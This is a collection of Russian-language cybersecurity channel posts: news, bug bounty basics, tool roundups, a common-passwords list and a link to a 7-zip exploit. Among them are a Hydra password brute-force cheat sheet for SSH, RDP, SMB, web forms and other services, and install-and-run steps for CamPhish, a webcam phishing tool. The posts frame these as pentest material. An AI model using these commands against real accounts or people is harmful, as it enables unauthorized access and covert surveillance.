🤨 Половина спутников шлёт данные в открытом виде — без шифрования!

Учёные из Калифорнийского университета провели исследование и офигели:
🖱 оказывается, имея передатчик за $800, можно спокойно перехватывать терабайты незашифрованных данных прямо со спутников.

И это не просто сигналы IoT или погоды — среди утечек:
🟢телеметрия военных и правительственных спутников,
🟢данные о передвижении техники,
🟢операции против наркокартелей,
🟢технические параметры UH-60 Black Hawk и других машин.

Профессор UCSD Аарон Шульман признался:

➡️ «Мы были шокированы. Мы думали, что всё это зашифровано. Но раз за разом — нет».

💀 В 2025-м ловить секретную инфу можно буквально *на коленке*.

🎯 Баг Баунти PlayBook. Вливаемся в охоту. Руководство на русском.

«Баг баунти» — это программа, в рамках которой компании привлекают сторонних специалистов («белых хакеров» или «багхантеров») для поиска уязвимостей в своих программных продуктах и системах за денежное вознаграждение.
Такие программы помогают компаниям улучшить кибербезопасность, выявляя и исправляя слабые места до того, как ими воспользуются злоумышленники.

Как это работает:
➡️Поиск уязвимостей: Участники (багхантеры) ищут ошибки и уязвимости в заявленных системах, веб-сайтах или приложениях.
➡️Сообщение о находке: Найденные уязвимости подробно описываются и передаются компании.
➡️Вознаграждение: За каждый обнаруженный баг, который соответствует условиям программы, компания выплачивает вознаграждение. Размер выплаты зависит от серьезности уязвимости.

#doc #pentest #redteam

💀 Exploiting 7-zip

CVE-2025-11001 / CVE-2025-11002

🔗 GitHub/Exploit

#soft

⚡️ Объектно-ориентированное программирование в Python С НУЛЯ для новичков!

💬 Что такое класс и объект на простых аналогиях;
💬 Как создавать атрибуты и методы;
💬 Что делает self и init;
💬 Как работают инкапсуляция и свойства @property;
💬 Зачем нужны геттеры, сеттеры и многое другое!

https://youtu.be/hKTH7-eK1Zw

Спасибо за поддержку друзья 🫶

#youtube

⌨️ «Побега из Шоушенка 2077»

В Румынии заключённый взломал тюремную IT-систему и устроил настоящий апдейт:

🚪 сокращал сроки;
💰 переводил деньги;
🙂 менял условия содержания;
🍑 и даже «разрешал» интимные свидания.

Работало всё идеально, пока гений не увлёкся онлайн-шопингом — бухгалтер заметила, что после покупок баланс не уменьшается 😂

Звучит как сценарий к фильму 😄

С добрым утром! ☕️

С добрым утром сталкеры! ☕️

💻 Перестаем светить свою почту! Временный email — лучший друг параноика.

mohmal — сервис, который создает временный временный email на 45 минут. Достаточно, чтобы словить код, пройти верификацию или подписаться на рассылку без риска утечки.

🧹 Письма удалятся сами, а таймер можно продлить. Никаких следов в твоём основном ящике.

🔐 Бесплатно, быстро и по-факту безопасно.

Пользуемся бесплатно ТУТ 😱

#cybersec #soft

💀 Искусственный интеллект глазами хакера

Концентрат лучших публикаций по пересечению искусственного интеллекта и кибербезопасности.

💬 Подробно разобрано, как нейросети уже меняют подходы к защите данных и одновременно создают новые угрозы.
💬 Рассматриваются приёмы обхода ограничений ChatGPT, применение ИИ для поиска уязвимостей и генерации эксплойтов, а также реальные кейсы использования GPT-4 в багбаунти-охоте.
💬 Показано, как чат-боты и QR-коды могут стать инструментом социальной инженерии и как использовать Llama и другие модели для автоматического анализа кода и поиска критичных уязвимостей.
💬 Отдельный блок посвящён генеративному ИИ: визуальные улучшения, создание контента и карта его практических возможностей в инфосеке.

⌨️ Руководство поможет понять, как использовать силу ИИ в мире хакеров.

Год: 2025

#books #pentest #cybersec

💻 Лучшие онлайн-сервисы для анализа IP-адресов

Хотите узнать всё о подозрительном IP-адресе? Эти сервисы помогут вам выявить VPN, прокси, фрод, геолокацию и возможную зловредную активность.

🖥 IPQualityScore 🔗 Перейти
✅ Анализирует IP на участие в мошеннических схемах.
✅ Выявляет VPN, прокси и смену устройств.
✅ Проверяет наличие вредоносного контента и редиректов.

🖥 IPInfo 🔗 Перейти
✅ Простой интерфейс и удобная работа.
✅ Определение геолокации и диапазона IP.
✅ Детектирует VPN и прокси.

🖥 Maxmind 🔗 Перейти
✅ Точное определение геопозиции по IP (GeoIP2).
✅ Фрод-детекция и выявление VPN/прокси.

🖥 VirusTotal 🔗 Перейти
✅ Проверяет репутацию IP и его участие в противоправной деятельности.
✅ Использует 100+ инструментов для детекции угроз.

🖥 MxToolBox 🔗 Перейти
✅ Специализируется на проверке IP, привязанных к доменам.
✅ Отлично подходит для массового поиска по доменам.

🖥 IPVoid 🔗 Перейти
✅ Широкий набор инструментов для анализа IP.
✅ Проверка на спам и вредоносную активность.

📌 Сохраняем подборку, пригодится!

#osint #cybersec #pentest

💻 Цифровая безопасность личности

Этот материал — практическое руководство по личной безопасности в цифровом мире.
Здесь собраны советы по защите себя и своих данных:
🖱 от кибер- и финансовой безопасности до приватности, анонимности и сохранности информации на всех ваших устройствах — мобильных и стационарных.

Простыми словами о том, как остаться в безопасности и сохранить контроль над своими данными.

#books

💻 Методы защиты информации. Защита от внешних вторжений: учебное пособие для вузов.

Предназначено для всех пользователей, стремящихся обеспечить защиту своей информации.

#books

💀Безопасники выкатили топ самых популярных паролей в 2025 году

123456
12345678
123456789
admin
1234
Aa123456
12345
password
123
1234567890

Ah shit, here we go again 🌟

🔐 Годная шпаргалка по Hydra — инструмент для параллельного подбора паролей, встроенная в различные операционные системы для пентеста такие как Kali Linux.

Брутфорс для SSH:

hydra -l username -P password_list.txt ssh://IP_адрес

Брутфорс для FTP:

hydra -l username -P password_list.txt ftp://IP_адрес

Брутфорс для RDP:

hydra -l username -P password_list.txt rdp://IP_адрес

Брутфорс для Telnet:

hydra -l username -P password_list.txt telnet://IP_адрес

Брутфорс для HTTP Basic Authentication:

hydra -l username -P password_list.txt http-get://IP_адрес

Брутфорс для HTTP-форм:

hydra -l username -P password_list.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"

Брутфорс для POP3:

hydra -l username -P password_list.txt pop3://IP_адрес

Брутфорс для SMTP:

hydra -l username -P password_list.txt smtp://IP_адрес

Брутфорс для IMAP:

hydra -l username -P password_list.txt imap://IP_адрес

Указание максимального числа потоков (например, 4):

hydra -t 4 -l username -P password_list.txt ftp://IP_адрес

Брутфорс с использованием логина из файла:

hydra -L user_list.txt -P password_list.txt ssh://IP_адрес

Брутфорс для VNC:

hydra -P password_list.txt vnc://IP_адрес

Брутфорс для SMB:

hydra -l username -P password_list.txt smb://IP_адрес

Прерывание брутфорс атаки после первой удачной попытки:

hydra -l username -P password_list.txt -f ssh://IP_адрес

Указание паузы между попытками (например, 2 секунды):

hydra -l username -P password_list.txt -t 4 -w 2 ssh://IP_адрес

Брутфорс с использованием прокси:

hydra -l username -P password_list.txt -o результат.txt -s порт -t 4 -x прокси:порт ssh://IP_адрес

Сохранение результатов в файл:

hydra -l username -P password_list.txt -o результат.txt ssh://IP_адрес

#doc #cheatsheet #pentest #redteam

💻 Как работает фишинг на веб-камеру

CamPhish — инструмент, который наглядно показывает, как с помощью социальной инженерии можно выманить у пользователя доступ к его камере. Никаких взломов — только игра на доверии и механика разрешений браузера.

🤨 Как строится атака с CamPhish

Типичный сценарий, на котором держится весь трюк:

🟢 Локальный сервер — злоумышленник запускает у себя поддельный сайт.
🟢 Проброс наружу — через ngrok/Cloudflare генерируется доступная извне ссылка на этот сайт.
🟢 Приманка — жертве отправляют ссылку под правдоподобным предлогом: “прямая трансляция”, “поздравление”, “онлайн-встреча”.
🟢 Запрос доступа — при переходе сайт просит разрешение на использование камеры.
🟢 Съёмка — если пользователь соглашается, инструмент делает снимки с его устройства.

Такую технику используют пентестеры, чтобы проверить, насколько сотрудники организации понимают риски фишинга и не нажимают на всё подряд.

💀 Что предлагает CamPhish

В комплекте несколько готовых шаблонов, которые имитируют реальные сценарии социнженерии:

💬 «Поздравление с праздником»
💬 Поддельная YouTube-трансляция
💬 Фейковая онлайн-встреча

Установка:

sudo apt-get -y install php wget unzip
git clone https://github.com/techchipnet/CamPhish
cd CamPhish

▶️ Запуск

bash camphish.sh

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

♎️ GitHub/Инструкция

#cybersec #pentest #redteam

⚡️ Практика Python ⚡️
⚔️ Дрон + Python
⚙️ Как Python автоматизировал склад с помощью дрона

♻️ https://youtu.be/liProfyxH4U

👍 Спасибо за просмотр и поддержку!

#youtube